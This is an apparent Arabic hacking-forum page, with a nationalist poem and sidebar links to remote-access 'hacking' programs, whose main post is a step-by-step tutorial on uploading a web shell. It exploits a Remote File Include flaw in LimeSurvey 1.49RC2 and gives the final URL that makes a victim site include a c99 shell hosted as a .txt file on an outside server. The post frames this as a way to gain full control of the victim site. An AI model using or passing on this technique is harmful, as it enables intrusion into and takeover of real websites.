دخول

لقد نسيت كلمة السر

عروبتنا هل ترى تنكرين ؟

عروبتنا هل ترى  تنكرين ؟
منحناكى كل الذى تطلبين

سكبنا الدماء على راحتيكى
لنحمى العرين فلا يستكين

وهبناكى كل رحيق الحياه
فلم نبق شئاً فهل تذكرين؟

فيا مصر صبراً على مارأيت
جفاء الرفاق لشعب آمين

سيبقى نشيدك رغم الجراح
يضئ الطريق على الحائرين

سيبقى عبيرك بيت الغريب
وسف الضعيف وحلم الحزين

سيبقى شبابك رغم الليالى
ضياء يشع على العالمين

فهيا اخلعى عنكى ثوب الهموم
غداً سوف يأتى بما تحلمين
تصويت
بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
» تعريف كاميرا النت تايجر 120
من طرف محمد ريحان السبت 19 ديسمبر 2015, 01:22

» برنامج استرجاع الملفات المحذوفة عربي ومجاني
من طرف حسين الإثنين 31 أغسطس 2015, 13:53

» برنامج اختراق اجهزة بدون فتح بورت
من طرف زائر الأحد 24 مايو 2015, 01:06

» برنامج برمودا 1.51 لاختراق الاجهزة والشرح بالصور
من طرف زائر الثلاثاء 12 مايو 2015, 14:59

» أوباما" يطالب "السيسى" تسليمه وثيقة إتفاقية بيع سيناء للإعتراف بعزل "مرسى"
من طرف  السبت 06 يوليو 2013, 16:44

» تعذيب حمادة ابوشيتة من اسباب خطف الجنود المصريين
من طرف  الخميس 16 مايو 2013, 15:46

» الجيش يجهز لعملية عسكرية للرد على اختطاف الجنود في سيناء
من طرف  الخميس 16 مايو 2013, 15:34

» اعطال الشحن
من طرف  الأحد 05 مايو 2013, 15:02

» استخراج اى مقطع صوتى من الفيديو بدون برامج
من طرف  الجمعة 26 أبريل 2013, 10:10

» اختراق الأجهزة مع برنامج AsbMay (ممتاز)عربي + شرح بالصور
من طرف خالد محمد الأربعاء 27 فبراير 2013, 02:10

التبادل الاعلانى المجانى

تسجيل صفحاتك المفضلة في مواقع خارجية

تسجيل صفحاتك المفضلة في مواقع خارجية digg  تسجيل صفحاتك المفضلة في مواقع خارجية delicious  تسجيل صفحاتك المفضلة في مواقع خارجية reddit  تسجيل صفحاتك المفضلة في مواقع خارجية stumbleupon  تسجيل صفحاتك المفضلة في مواقع خارجية slashdot  تسجيل صفحاتك المفضلة في مواقع خارجية yahoo  تسجيل صفحاتك المفضلة في مواقع خارجية google  تسجيل صفحاتك المفضلة في مواقع خارجية blogmarks  تسجيل صفحاتك المفضلة في مواقع خارجية live      

قم بحفض و مشاطرة الرابط منتدى البرامج على موقع حفض الصفحات

قم بحفض و مشاطرة الرابط منتدى التنين المصرى على موقع حفض الصفحات


مصر ام الدنيا






المتواجدون الآن ؟
ككل هناك 1 عُضو حالياً في هذا المنتدى :: 0 عضو مُسجل, 0 عُضو مُختفي و 1 زائر

لا أحد

[ مُعاينة اللائحة بأكملها ]


أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 41 بتاريخ الخميس 03 أغسطس 2017, 06:42

رفع الشل الجزء 2

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

رفع الشل الجزء 2

مُساهمة من طرف  في السبت 20 أغسطس 2011, 21:38



- رفع الشيل عبر ثغرات File Include فايل إنكلود -


اليوم راح نتناول طريقه رفع الشل من خلال ثغره فايل إنكلود ، ويمكننا البحث عن الثغرات من خلال أحد مواقع الحمايه وأهمها موقع


milw0rm

SecurityReason.com - Our Reason is Security


أنا أخترت ثغره من الميلوورم ، وبياناتها كما في الصورة التالية :

[img][/img]

كما هو واضح من الصورة هذه هي بيانات الثغرة وقد قسمتها لجزئين الأول خاص ببيانات الثغره التي تهمنا ، والجزء الثاني هو الإستغلال ، وسوف نتناول في البداية الجزء الأول ...


طبعاً هنالك عدة نقاط يجب معرفتها قبل عملية الاختراق ومن خلال النظر في الصورة نجد أن النقاط أو المعلومات التي تهمنا هي :
1- نوع الثغره ومن الصورة نجد أن نوعها هو ..
كود:

Type : RFI(Remote File Include)

أي ثغره من نوع فايل إنكلود .

2- اسم السكربت المصاب :
كود:

****** name : LimeSurvey (PHPSurveyor)

3-الإصدار المصاب وهو :
كود:

Version : 1.49RC2



المعلومة الأخيرة التي نحتاجها موجودة في القسم رقم 2 وهي الإستغلال وكما نلاحظ هنالك العديد من طرق الإستغلال للثغره ، وسوف نتناول أحدها :
كود:

/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]



الأن سوف نقوم بتطبيق المعطيات السابقه ، أمامنا كمثال الموقع التالي :
كود:

http://victim.com

والسكربت المصاب والإصدار هو :
كود:

LimeSurvey والإصدار 1.49RC2

وهو راكب عليه هكذا :
كود:

http://victim.com/ls



إذا بما أن السكربت داخل مجلد ls فان تطبيق الاستغلال سوف يكون كما يلي :
كود:

http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]



بكذا نكون طبقنا الإستغلال وتبقى لنا إستبدال عبارة [****l]برابط الشل الذي رفعناه في الدرس السابق على مساحتنا المجانية ولنفرض أن رابط الشل كما يلي :
كود:

http://mysite.com/black/c99.txt

لاحظوا أن امتداده txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل




وعليه سوف يكون الاستغلال بصورته النهائية كما يلي :


كود:

http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://mysite.com/black/c99.txt?

وبكذا نكون أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة :
كود:

http://mysite.com/black/c99.txt

داخل موقع الضحية وقراءتها على سيرفر الضحية ، ونقدر نتحكم بالموقع كامل من خلال هذي الطريقه ..



وكذا نكون قد اتممنا الجزء 2 وإلى لقاء قادم إنشاء الله


تاريخ التسجيل : 01/01/1970

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى